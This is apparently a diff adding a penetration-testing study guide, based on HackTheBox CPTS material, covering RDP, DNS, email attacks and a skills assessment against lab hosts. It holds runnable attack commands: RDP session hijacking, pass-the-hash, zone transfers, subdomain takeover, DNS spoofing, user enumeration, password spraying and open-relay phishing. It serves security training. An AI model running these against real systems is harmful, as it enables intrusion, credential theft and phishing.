+C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
+C:\htb> net start sessionhijack :: reconnects you to lewen's (id 2) session
+```
+
+Confirmed **broken on Server 2019+** — Microsoft restricted the technique; check the target build first.
+
+**Pass-the-Hash via Restricted Admin Mode.** Disabled by default; enabling it needs prior local admin. Then `xfreerdp /pth:` authenticates with the raw NTLM hash — the RDP equivalent of SMB PtH:
+
+```cmd
+C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
+```
+```bash
+xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9
+```
+
+**BlueKeep (CVE-2019-0708)** — concept only. Attacker-manipulated data during the RDP virtual-channel settings exchange (Source) triggers a Use-After-Free in a kernel function running as `LocalSystem` (Process/Privileges), and the trigger cycle writes and executes attacker instructions in the freed memory for network RCE (Destination).
+
+> [!warning] Stability risk
+> BlueKeep can crash the target with a BSOD and has caused real instability in the wild. For labs, Metasploit's `rdp_scanner` aux and `cve_2019_0708_bluekeep_rce` modules are the vetted route. Against anything a client cares about, get explicit sign-off before firing.
+
+---
+
+## 9 · Attacking DNS `fas:Terminal` — UDP/53, TCP/53
+
+DNS underpins nearly every network application, which makes it a consistently high-value surface. Three distinct vectors here have very different reach: zone transfer and subdomain takeover are remotely exploitable; DNS spoofing needs local L2 adjacency.
+
+**Zone transfer (AXFR).** A zone transfer copies a chunk of the DNS database for replication and requires no auth by protocol design. A server that permits AXFR from any client leaks its entire internal namespace in one request:
+
+```bash
+nmap -p53 -Pn -sV -sC 10.10.110.213 # 53/tcp open domain ISC BIND 9.11.3
+dig AXFR @ns1.inlanefreight.htb inlanefreight.htb
+# admin.inlanefreight.htb. IN A 10.129.110.21
+# hr.inlanefreight.htb. IN A 10.129.110.25 ← internal hostnames + IP scheme, unauthenticated
+fierce --domain zonetransfer.me # automates AXFR across every discovered NS
+```
+
+**Subdomain enumeration → takeover.** A `CNAME` pointing at a deleted/expired third-party resource (an S3 bucket, a CDN endpoint) leaves the subdomain "dangling." Claim that resource and you control what the trusted subdomain serves — without ever touching the target's own DNS:
+
+```bash
+./subfinder -d inlanefreight.com -v # passive, OSINT-sourced — fast and quiet
+host support.inlanefreight.com
+# is an alias for inlanefreight.s3.amazonaws.com → visiting returns AWS "NoSuchBucket"
+# register an S3 bucket named 'inlanefreight' ⇒ takeover
+```
+
+Check every third-party-hosted CNAME against **`can-i-take-over-xyz`** (catalogues which providers are currently vulnerable and how to claim each), or automate detection with **Nuclei**'s `subdomain-takeover` templates. Run passive enumeration (Subfinder) before active brute force (Subbrute/Sublist3r).
+
+**Local DNS spoofing (Ettercap / Bettercap).** Strictly L2-adjacent, unlike the two vectors above. Poison the answer, then ARP-spoof yourself into the path:
+
+```bash
+cat /etc/ettercap/etter.dns
+# inlanefreight.com A 192.168.225.110
+# *.inlanefreight.com A 192.168.225.110
+# Ettercap: Hosts > Scan for Hosts → set victim=Target1, gateway=Target2 → Plugins > dns_spoof
+```
+
+**Bettercap** is the maintained, more scriptable successor to Ettercap and worth defaulting to for MITM/spoofing work.
+
+---
+
+## 10 · Attacking email services `fas:Terminal` — SMTP 25/465/587 · POP3 110/995 · IMAP 143/993
+
+Email needs at least two protocols — SMTP for sending, POP3/IMAP for retrieval — and increasingly a cloud provider in front of both. The MX record decides the entire approach that follows.
+
+<figure class="flow plate corners">
+ <figcaption class="flow__cap"><span class="flow__kind">MX record decides the path</span><span class="flow__dir">TD</span></figcaption>
+ <div class="flow__body">
+ <div class="flow__diagram" data-dir="td">
+ <div class="flow-rank"><div class="flow-node is-entry">dig/host MX record</div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node is-decision">Cloud provider or self-hosted?</div></div>
+ <div class="flow-branches">
+ <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">self-hosted</span></div><div class="flow-node">nmap 25,110,143,465,587,993,995<span class="sub">VRFY/EXPN/RCPT · USER · open relay</span></div></div>
+ <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Office 365</span></div><div class="flow-node">o365spray --validate → --enum → --spray<span class="sub">purpose-built, lockout-aware</span></div></div>
+ </div>
+ <div class="flow-join"></div>
+ <div class="flow-rank"><div class="flow-node is-goal">Mailbox access → search for 'password'</div></div>
+ </div>
+ </div>
+</figure>
+
+> [!info] MX reconnaissance first
+> The MX record identifies who handles the domain's mail — Microsoft 365 (`*.mail.protection.outlook.com`), G-Suite (`aspmx.l.google.com`), Zoho (`mx.zoho.com`), or a self-hosted server. Each needs a completely different enumeration approach, so resolve it before anything else.
+
+**MX + port enumeration:**
+
+```bash
+host -t MX hackthebox.eu # aspmx.l.google.com → cloud (G-Suite)
+dig mx inlanefreight.com | grep MX | grep -v ';'
+host -t A mail1.inlanefreight.htb. # resolve the mail host, then scan it
+sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128
+# 25/tcp smtp Postfix smtpd · smtp-commands: ... VRFY ... ← VRFY present ⇒ user enum worth trying
+```
+
+**Manual SMTP username enumeration.** Three independent primitives — disabling one (commonly `VRFY`) doesn't close the others, so test all three:
+
+```bash
+telnet 10.10.110.20 25
+VRFY root # 252 = exists · 550 = unknown
+EXPN support-team # expands a distribution list into member addresses (bigger leak)
+MAIL FROM:john@inlanefreight.htb
+RCPT TO:john # 250 = recipient ok · 550 = user unknown (hard to disable)
+```
+
+**POP3 user enumeration + automation:**
+
+```bash
+telnet 10.10.110.20 110
+USER john # +OK = valid · -ERR = invalid
+smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
+# john@inlanefreight.htb exists
+```
+
+**Office 365 enumeration and spraying.** Generic tools are blocked by Microsoft's throttling — use a purpose-built tool that respects lockout, and keep it current as MS changes endpoint behaviour:
+
+```bash
+python3 o365spray.py --validate --domain msplaintext.xyz # is this domain even O365?
+python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz # valid accounts, no password needed
+python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
+# [VALID] julio@msplaintext.xyz:March2022!
+```
+
+**Password attacks against self-hosted mail (Hydra).** `-L users -p 'password'` sprays; swap the module name for `smtp`/`imap`:
+
+```bash
+hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
+# [110][pop3] login: john password: Company01!
+```
+
+**Open relay abuse.** A relay that forwards mail from arbitrary sources without auth lets you send *as* any internal address — a phishing-as-trusted-sender capability, not just info disclosure:
+
+```bash
+nmap -p25 -Pn --script smtp-open-relay 10.10.11.213 # Server is an open relay (14/16 tests)
+swaks --from admin@company.com --to john@company.com \
+ --header 'Subject: Company Notification' \
+ --body 'Please complete this survey: http://phish/' --server 10.10.11.213
+```
+
+**OpenSMTPD RCE (CVE-2020-7247)** — concept only. Unauthenticated input during SMTP session composition (Source) is misparsed by OpenSMTPD's sender-field handler, which treats a `;` as a delimiter into shell execution rather than terminating the address (Process). Because OpenSMTPD binds a standardised port it runs as root (Privileges), so the smuggled 64-char-limited command executes as root and shells back out (Destination) — a clean reminder that a simple parsing bug in a root-owned, standard-port daemon is full unauthenticated RCE.
+
+---
+
+## 11 · Skills assessment `fas:Terminal`
+
+The module closes with three Inlanefreight servers — Easy, Medium, Hard — each hiding an `HTB{...}` flag and requiring the whole module's toolkit against a target with no hints beyond a short business description. None of the three needs a novel technique; the assessment is proof the per-service checklists and the Concept-of-Attacks model generalise.
+
+> [!info] Scenario briefs (read them like a scoping doc)
+> - **Easy** — "manages emails, customers, and their files" → email + file share (SMB/FTP) enumeration first.
+> - **Medium** — an internal `inlanefreight.htb` host that "stores emails and files... used relatively rarely... only for testing" → a probably-under-hardened box; prioritise default/test credentials.
+> - **Hard** — an internal file/working-material server that also runs "a database... the purpose of which we do not know" → file-share enumeration chained into an unknown SQL database via credential reuse.
+
+**Methodology for all three** — the brief itself is reconnaissance:
+
+```bash
+sudo nmap -p- -sV -sC -T4 <TARGET_IP> -oN full_scan.txt
+```
+
+- `-p-` scans all 65535 ports, not the default top-1000 — non-negotiable on "internal / rarely used" hosts that frequently run services on non-standard ports.
+- Then work each open port through its section above, **anonymous/null access first** (it's free), then default/weak creds, then known misconfigs, then version CVEs.
+
+| Port | Apply |
+|---|---|
+| 21 (FTP) | §5 — anonymous login, brute force, CVEs |
+| 139/445 (SMB) | §6 — null session, `smbclient -L`, `smbmap`, spray |
+| 1433/3306 (SQL) | §7 — default/weak creds, `xp_cmdshell`, file r/w |
+| 3389 (RDP) | §8 — spray, PtH if a hash is available |
+| 53 (DNS) | §9 — zone transfer, subdomain enumeration |
+| 25/110/143 (Mail) | §10 — user enumeration, open relay, spray |
+
+**The connective tissue is credential reuse.** One confirmed credential set is worth testing against *every* discovered service immediately — `nxc`/`crackmapexec` share the same `-u`/`-p` syntax across `smb`, `mssql`, `ftp`, `ssh`, which is exactly what the Hard scenario (file server → unknown database) is built to test.
+
+---
+
+## Cross-service chaining — the whole point `fas:Lightbulb`
+
+Individually, none of these services is a "vulnerability." Their value is how they chain:
+
+1. **Anonymous/null first, everywhere.** FTP `ftp-anon`, SMB `-N`, mailbox `USER` probes — cheap, fast, non-destructive, and frequently the entire foothold.
+2. **Everything is a candidate credential.** An empty filename, a config value, a mailbox string, a connection string in a binary → test it as a username *and* a password against every other service.
+3. **Misconfig before CVE.** Default creds, anonymous auth, and exposed management interfaces land more boxes than memory-corruption bugs. Check them first.
+4. **Hashes are as good as passwords.** A dumped SAM hash or a Responder-captured NetNTLMv2 is immediately actionable via Pass-the-Hash or relay — cracking is a bonus, not a requirement.
+5. **Signing and lockout are the two flags to note during enumeration** — SMB `smb2-security-mode` decides whether relay is on the table; the account lockout policy decides how aggressively you can spray.
+
+---
+
+## References & sources `fas:BookOpen`
+
+Distilled from the HackTheBox Academy **Attacking Common Services** module (CPTS path, module 11) and field-tested tooling notes.
+
+1. [OWASP Top 10 · A05:2021 Security Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/)
+2. [CVE-2022-22836 · CoreFTP arbitrary file write](https://nvd.nist.gov/vuln/detail/CVE-2022-22836)
+3. [CVE-2020-0796 · SMBGhost](https://nvd.nist.gov/vuln/detail/CVE-2020-0796)
+4. [CVE-2019-0708 · BlueKeep](https://nvd.nist.gov/vuln/detail/CVE-2019-0708)
+5. [CVE-2020-7247 · OpenSMTPD RCE](https://nvd.nist.gov/vuln/detail/CVE-2020-7247)
+6. [CVE-2021-44228 · Log4Shell](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
+7. [can-i-take-over-xyz · subdomain takeover reference](https://github.com/EdOverflow/can-i-take-over-xyz)
+8. [Microsoft · xp_cmdshell (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql)
+9. [NetExec (nxc) · documentation](https://www.netexec.wiki/)
+10. [Impacket · Fortra/impacket](https://github.com/fortra/impacket)
+
+> [!navigation] Keep going
+> **Condensed card:** [Attacking Common Services cheat sheet](/sheets/pentest-workflow/attacking-common-services) · **Field manual:** [Network Service Attack Manual](/sheets/pentest-workflow/network-service-attack-manual) · **Applications:** [Attacking Common Applications guide](/sheets/pentest-workflow/attacking-common-applications-guide) · **Credentials:** [Password Attacks & Credential Hunting](/sheets/pentest-workflow/password-attacks-and-credential-hunting) · **Dashboard:** [CPTS Workflow](/sheets/pentest-workflow/attacking-common-modules-dashboard)
diff --git a/src/content/sheets/pentest-workflow/attacking-common-services.md b/src/content/sheets/pentest-workflow/attacking-common-services.md
@@ -10,7 +10,7 @@ difficulty: intermediate
updated: "2026-08-29"
source: "vault:Pentest Attack Flow/General Pentest Cheatsheets/01 - Attacking Common Services - CPTS Cheat Sheet.md"
---
-[← Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Full field manual](/sheets/pentest-workflow/network-service-attack-manual) · [Next: Common Applications →](/sheets/pentest-workflow/attacking-common-applications)
+[← Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Full walkthrough guide](/sheets/pentest-workflow/attacking-common-services-guide) · [Field manual](/sheets/pentest-workflow/network-service-attack-manual) · [Next: Common Applications →](/sheets/pentest-workflow/attacking-common-applications)
# Attacking Common Services — CPTS Cheat Sheet `fas:ClipboardList`
@@ -571,6 +571,6 @@ swaks --from admin@company.com --to john@company.com --header 'Subject: Company
---
-[← Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Full field manual](/sheets/pentest-workflow/network-service-attack-manual) · [Next: Common Applications →](/sheets/pentest-workflow/attacking-common-applications)
+[← Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Full walkthrough guide](/sheets/pentest-workflow/attacking-common-services-guide) · [Field manual](/sheets/pentest-workflow/network-service-attack-manual) · [Next: Common Applications →](/sheets/pentest-workflow/attacking-common-applications)
#HTB #CPTS #AttackingCommonServices #Services #Pentest